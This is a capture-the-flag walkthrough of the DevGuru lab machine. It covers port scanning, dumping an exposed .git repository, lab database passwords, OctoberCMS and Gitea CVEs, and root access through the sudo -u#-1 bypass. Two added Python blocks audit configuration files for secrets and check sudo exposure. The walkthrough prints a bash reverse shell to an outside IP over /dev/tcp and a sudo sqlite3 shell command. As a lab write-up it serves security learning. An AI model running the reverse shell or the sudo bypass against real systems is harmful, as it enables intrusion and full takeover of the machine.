PORT SCAN
┌──(kali㉿kali)-[~]
└─$ sudo rustscan -a devguru.local -- -sV -O -A -sC
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.68.209:22
Open 192.168.68.209:80
Open 192.168.68.209:8585
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -O -A -sC" on ip 192.168.68.209
Depending on the complexity of the script, results may take some time to appear.
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #3333
33; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p
\{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #0000
00; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #3333
33; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p
\{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #0000
00; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 00:38 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:38
Completed NSE at 00:38, 0.00s elapsed
Initiating ARP Ping Scan at 00:38
Scanning 192.168.68.209 [1 port]
Completed ARP Ping Scan at 00:38, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 00:38
Scanning devguru.local (192.168.68.209) [3 ports]
Discovered open port 80/tcp on 192.168.68.209
Discovered open port 22/tcp on 192.168.68.209
Discovered open port 8585/tcp on 192.168.68.209
Completed SYN Stealth Scan at 00:38, 0.02s elapsed (3 total ports)
Initiating Service scan at 00:38
Scanning 3 services on devguru.local (192.168.68.209)
Stats: 0:01:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 00:40 (0:00:41 remaining)
Completed Service scan at 00:39, 86.39s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against devguru.local (192.168.68.209)
NSE: Script scanning 192.168.68.209.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.53s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
Nmap scan report for devguru.local (192.168.68.209)
Host is up, received arp-response (0.00022s latency).
Scanned at 2024-01-16 00:38:04 CST for 89s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+lft/kQdC+3L4qMerPmpboe5GOrB60x+QU0R7hjmxY+9bNqST//1+Oa7ycVotqdlk4EtxgnqE2B4mRTNb16mITv/Y8UfsCqYAuy3C8lV9HzG6zgsXgnAhvpMmY31fZqz+dKamnp1W1o+scbnzRN
qr/fE1+Yz7Fcu4JvAJ/4NLQS9CHmZh+N12OyF8eVOQmjPeRVHR8BiptinM+EXis4xpOQiuZoEBPkyqhXcBW65CAXlkjuuJ6KpJ7Y3Gbse38L6LKGFs8Hl5k1jbuTxDg8CT+rzzy6on8niDDfcVwHTvZ1JqlUpzjaGifDD8gV60ebRa5/36ORI+ed6G9v
1HOW3r
| 256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQzBnXE0Ezf7XOzh2KxdMAetOtoTEmfiCh2OSwjnIpAzd1osDr7UsuNt/5m45OgfWVAcVnu3ECEuQZ03P4VxkU=
| 256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINjsvy3HYYZxlENx0Fmval1Ax8ApGBKu6wf5sjK8xuv2
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
|_http-generator: DevGuru
| http-git:
| 192.168.68.209:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
8585/tcp open unknown syn-ack ttl 64
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=3ef4c57e2ce5d03b; Path=/; HttpOnly
| Set-Cookie: _csrf=x_ZleYXUfeF2AQwFaksOzr1os-A6MTcwNTMzNjY5MDgzNzQ1NDY5OA; Path=/; Expires=Tue, 16 Jan 2024 16:38:10 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 15 Jan 2024 16:38:10 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
| <meta name="description" content="Gitea (Git with a cup of tea) is a painless
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gitea=1a9e8835f6ca7e2a; Path=/; HttpOnly
| Set-Cookie: _csrf=y2bCvV6g4oUEOhbyGyNNNVJAlL86MTcwNTMzNjY5MDg4NzcxNjU0MQ; Path=/; Expires=Tue, 16 Jan 2024 16:38:10 GMT; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Mon, 15 Jan 2024 16:38:10 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Page Not Found - Gitea: Git with a cup of tea </title>
| <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
| <meta name="theme-color" content="#6cc644">
| <meta name="author" content="Gitea - Git with a cup of tea" />
|_ <meta name="description" content="Gitea (Git with a c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:3C:66:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
Uptime guess: 48.523 days (since Tue Nov 28 12:05:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms devguru.local (192.168.68.209)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:39
Completed NSE at 00:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.65 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)
FOOTHOLD
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corp - DevGuru
|_http-generator: DevGuru
| http-git:
| 192.168.68.209:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: first commit
| Remotes:
| http://devguru.local:8585/frank/devguru-website.git
|_ Project type: PHP application (guessed from .gitignore)
There is a .git folder; let's try to download it and find something interesting.
But when we use wget -r, there is an error:
kali@kali:~$ wget -r http://devguru.local/.git
--2024-01-16 00:53:28-- http://devguru.local/.git
Resolving devguru.local (devguru.local)... 192.168.68.209
Connecting to devguru.local (devguru.local)|192.168.68.209|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://devguru.local/.git/ [following]
--2024-01-16 00:53:28-- http://devguru.local/.git/
Reusing existing connection to devguru.local:80.
HTTP request sent, awaiting response... 404 Not Found
2024-01-16 00:53:29 ERROR 404: Not Found.
The reason is that the server does not allow directory listing.
So, let's try git-dumper:
~/opt/pyenvenv/bin/git-dumper http://192.168.68.209:80/.git/ ~/Desktop/devguru
and then we get all the files:
kali@kali:~/Desktop/devguru$ ls -la
total 416
drwxr-xr-x 9 kali kali 4096 Jan 16 00:56 .
drwxr-xr-x 18 kali kali 4096 Jan 16 00:56 ..
-rw-r--r-- 1 kali kali 362514 Jan 16 00:56 adminer.php
-rw-r--r-- 1 kali kali 1640 Jan 16 00:56 artisan
drwxr-xr-x 2 kali kali 4096 Jan 16 00:56 bootstrap
drwxr-xr-x 2 kali kali 4096 Jan 16 00:56 config
drwxr-xr-x 7 kali kali 4096 Jan 16 00:56 .git
-rw-r--r-- 1 kali kali 413 Jan 16 00:56 .gitignore
-rw-r--r-- 1 kali kali 1678 Jan 16 00:56 .htaccess
-rw-r--r-- 1 kali kali 1173 Jan 16 00:56 index.php
drwxr-xr-x 5 kali kali 4096 Jan 16 00:56 modules
drwxr-xr-x 3 kali kali 4096 Jan 16 00:56 plugins
-rw-r--r-- 1 kali kali 1518 Jan 16 00:56 README.md
-rw-r--r-- 1 kali kali 551 Jan 16 00:56 server.php
drwxr-xr-x 6 kali kali 4096 Jan 16 00:56 storage
drwxr-xr-x 4 kali kali 4096 Jan 16 00:56 themes
OK, let's check them now.
We find something in config/database.php:
'mysql' => [
'driver' => 'mysql',
'engine' => 'InnoDB',
'host' => 'localhost',
'port' => 3306,
'database' => 'octoberdb',
'username' => 'october',
'password' => 'SQ66EBYx4GT3byXH',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'varcharmax' => 191,
],
Using Gobuster, we find something:
└─$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://devguru.local -x php,txt,bak,old -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devguru.local
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,bak,old
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 200) [Size: 1678]
/0 (Status: 200) [Size: 12669]
/About (Status: 200) [Size: 18661]
/Services (Status: 200) [Size: 10032]
/about (Status: 200) [Size: 18661]
/adminer.php (Status: 200) [Size: 4228]
/backend (Status: 302) [Size: 410] [--> http://devguru.local/backend/backend/auth]
/adminer.php:
We find a credential here with a bcrypt-hashed password: $2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK
Let's analyse it:
It is very hard to crack, but we can replace it using MySQL:
Now, let's try to log in.
CVE-2022-21705: https://cyllective.com/blog/post/octobercms-cve-2022-21705
Try a base64-encoded reverse shell:
kali@kali:~$ echo 'bash -i >& /dev/tcp/192.168.68.107/443 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY4LjEwNy80NDMgMD4mMQo=
We got it:
We find something interesting in /var/backups:
www-data@devguru:/var/lib$ cd /var/backups/
www-data@devguru:/var/backups$ ls
app.ini.bak apt.extended_states.0 apt.extended_states.1.gz
www-data@devguru:/var/backups$ grep -irn pass /var/backups/app.ini.bak
407:; Use PASSWD = `your password` for quoting if you use special characters in the password.
408:PASSWD = UfFPTF8C8jjxVF2m
531:; The minimum password length for new Users
532:MIN_PASSWORD_LENGTH = 6
544:; Comma separated list of character classes required to pass minimum complexity.
547:PASSWORD_COMPLEXITY = off
548:; Password Hash algorithm, either "argon2", "pbkdf2", "scrypt" or "bcrypt"
549:PASSWORD_HASH_ALGO = pbkdf2
552:; Validate against https://haveibeenpwned.com/Passwords to see if a password has been exposed
553:PASSWORD_CHECK_PWN = false
594:; Time limit to perform the reset of a forgotten password
595:RESET_PASSWD_CODE_LIVE_MINUTES = 180
609:; This setting enables gitea to be signed in with HTTP BASIC Authentication using the user's password
610:; If you set this to false you will not be able to access the tokens endpoints on the API with your password
716:; Mailer user name and password
719:; Use PASSWD = `your password` for quoting if you use special characters in the password.
720:PASSWD =
740:; redis: network=tcp,addr=:6379,password=macaron,db=0,pool_size=100,idle_timeout=180
763:; redis: network=tcp,addr=:6379,password=macaron,db=0,pool_size=100,idle_timeout=180
764:; mysql: go-sql-driver/mysql dsn config string, e.g. `root:password@/session_table`
910:; Mailer user name and password
912:; Use PASSWD = `your password` for quoting if you use special characters in the password.
913:PASSWD =
1165:; Don't pass the file on STDIN, pass the filename as argument instead.
1180:; If there is a password of redis, use `addrs=127.0.0.1:6379 password=123 db=0`.
[database]
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD = UfFPTF8C8jjxVF2m
; For Postgres, schema to use if different from "public". The schema must exist beforehand,
; the user must have creation privileges on it, and the user search path must be set
Here is a new credential for MySQL. Let's try to use it:
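As an added defender-side check (not part of the original writeup), the following Python audits a backup directory for live credentials left in configuration files such as app.ini.bak: commented-out lines like "; Use PASSWD = `your password`" and empty "PASSWD =" entries are skipped, policy keys such as PASSWORD_HASH_ALGO are not treated as secrets, and every hit is reported together with whether the file is world-readable. The sample app.ini.bak text, its placeholder passwords and the secret-key list are constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Keys holding a secret in Gitea's app.ini (assumed list); policy keys such as PASSWORD_HASH_ALGO are not listed.
SECRET_KEYS = {"PASSWD", "PASSWORD", "SECRET_KEY", "INTERNAL_TOKEN", "JWT_SECRET"}
KV_RE = re.compile(r"^([A-Za-z0-9_]+)\s*=\s*(.*)$")
# Secrets embedded in DSN-style values, e.g. "network=tcp,addr=:6379,password=..."
EMBEDDED_RE = re.compile(r"password=([^,\s]+)", re.I)

def find_secrets(text):
    """Return (lineno, section, key) for every live, non-empty secret in INI text."""
    hits, section = [], ""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in ";#":   # "; Use PASSWD = `your password` ..." is a comment
            continue
        if line[0] == "[" and line[-1] == "]":
            section = line[1:-1]
            continue
        if not (m := KV_RE.match(line)):
            continue
        key, value = m.group(1).upper(), m.group(2).strip().strip("`'\"")
        if not value:                      # "PASSWD =" with nothing set is harmless
            continue
        if key in SECRET_KEYS or key.endswith(("_PASSWD", "_PASSWORD")) or EMBEDDED_RE.search(value):
            hits.append((n, section, m.group(1)))
    return hits

def audit_dir(directory):
    """Walk a backup directory; report live secrets and whether the file is world-readable."""
    findings = []
    for path in sorted(Path(directory).rglob("*")):
        if not path.is_file():
            continue
        for lineno, section, key in find_secrets(path.read_text(errors="replace")):
            findings.append({"file": path.name, "line": lineno, "section": section, "key": key,
                             "world_readable": bool(path.stat().st_mode & 0o004)})
    return findings

# Constructed sample modelled on the app.ini.bak excerpt above; the secrets are placeholders.
SAMPLE_APP_INI = """\
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWORD_HASH_ALGO = pbkdf2
[database]
USER = gitea
PASSWD = PLACEHOLDER_DB_PASSWORD
[mailer]
PASSWD =
[session]
PROVIDER_CONFIG = network=tcp,addr=:6379,password=PLACEHOLDER_REDIS,db=0
"""

def demo():
    # Write the sample as a world-readable app.ini.bak in a temp dir and audit it.
    tmp = tempfile.mkdtemp()
    bak = Path(tmp, "app.ini.bak")
    bak.write_text(SAMPLE_APP_INI)
    bak.chmod(0o644)
    return audit_dir(tmp)
```

Running audit_dir over /var/backups on the box would flag the [database] PASSWD line shown above and the fact that the backup is readable by www-data.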
By checking the docs:
Let's change the hash_algo to bcrypt and use admin as the new password:
We notice that the Gitea version is 1.12.5.
CVE-2020-14144: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
Upload the hook, and then upload a new file:
Then we get a shell:
ROOT
Check the sudo version and configuration:
sudo 1.8.27 - Security Bypass: https://www.exploit-db.com/exploits/47502
sqlite3 sudo PE: https://gtfobins.github.io/gtfobins/sqlite3/
Let's try sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh':
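An added example, not from the original writeup: a Python check a defender can run over collected `sudo --version` output and sudoers text to flag the combination the linked sudo 1.8.27 bypass needs, an unpatched sudo together with a rule whose runas list is (ALL, !root). The first fixed release, 1.8.28, is taken from the sudo advisory rather than from this page, and the version output and sudoers lines are constructed samples.

```python
import re

# First sudo release that rejects the -u#-1 user id (from the sudo advisory, not the writeup).
FIRST_FIXED = (1, 8, 28)

# Runas specification "(ALL, !root)": any user except root, the shape the -u#-1 bypass
# turns into root on an unpatched sudo.
RUNAS_RE = re.compile(r"=\s*\(\s*ALL\s*,\s*!\s*root\s*\)")
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)")

def parse_sudo_version(output):
    """Extract (major, minor, patch) from `sudo --version` output."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("no sudo version line found")
    return tuple(int(part) for part in m.groups())

def risky_rules(sudoers_text):
    """Return the sudoers rules whose runas list is (ALL, !root)."""
    hits = []
    for raw in sudoers_text.splitlines():
        # A '#' at line start or after whitespace opens a comment; "!#0" inside a runas list is kept.
        line = re.split(r"(?:^|\s)#", raw, 1)[0].strip()
        if line and RUNAS_RE.search(line):
            hits.append(line)
    return hits

def assess(version_output, sudoers_text):
    """Exposure needs both signals: a sudo older than FIRST_FIXED and an (ALL, !root) rule."""
    version = parse_sudo_version(version_output)
    rules = risky_rules(sudoers_text)
    return {
        "version": version,
        "patched": version >= FIRST_FIXED,
        "rules": rules,
        "exposed": version < FIRST_FIXED and bool(rules),
    }

# Constructed samples (not captured from the target).
SAMPLE_VERSION = "Sudo version 1.8.27\nSudoers policy plugin version 1.8.27\n"
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
someuser ALL=(ALL, !root) /usr/bin/sqlite3
"""

if __name__ == "__main__":
    print(assess(SAMPLE_VERSION, SAMPLE_SUDOERS))
```

Either upgrading sudo past 1.8.28 or rewriting the rule so it names the intended runas user instead of excluding root clears the "exposed" flag.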